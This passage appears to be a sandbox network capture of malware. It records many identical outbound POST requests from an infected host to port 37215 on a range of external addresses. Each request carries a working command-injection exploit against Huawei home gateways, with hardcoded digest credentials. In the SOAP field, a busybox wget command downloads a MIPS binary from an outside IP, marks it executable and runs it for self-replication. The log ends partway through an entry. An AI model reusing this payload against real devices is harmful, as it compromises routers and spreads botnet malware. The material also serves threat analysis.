69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  313192.168.2.133655892.16.133.18237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098840952 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  314192.168.2.133452441.189.203.1737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098866940 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  315192.168.2.1354296197.5.228.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098866940 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  316192.168.2.134858641.61.33.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098871946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  317192.168.2.1352552157.243.146.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098898888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  318192.168.2.13418201.196.194.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098906994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  319192.168.2.134050841.104.148.15537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098915100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  320192.168.2.1359852157.34.228.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.098933935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  321192.168.2.1355928197.213.160.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099495888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  322192.168.2.1353686114.3.158.7837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099498034 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  323192.168.2.1355678197.34.42.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099500895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
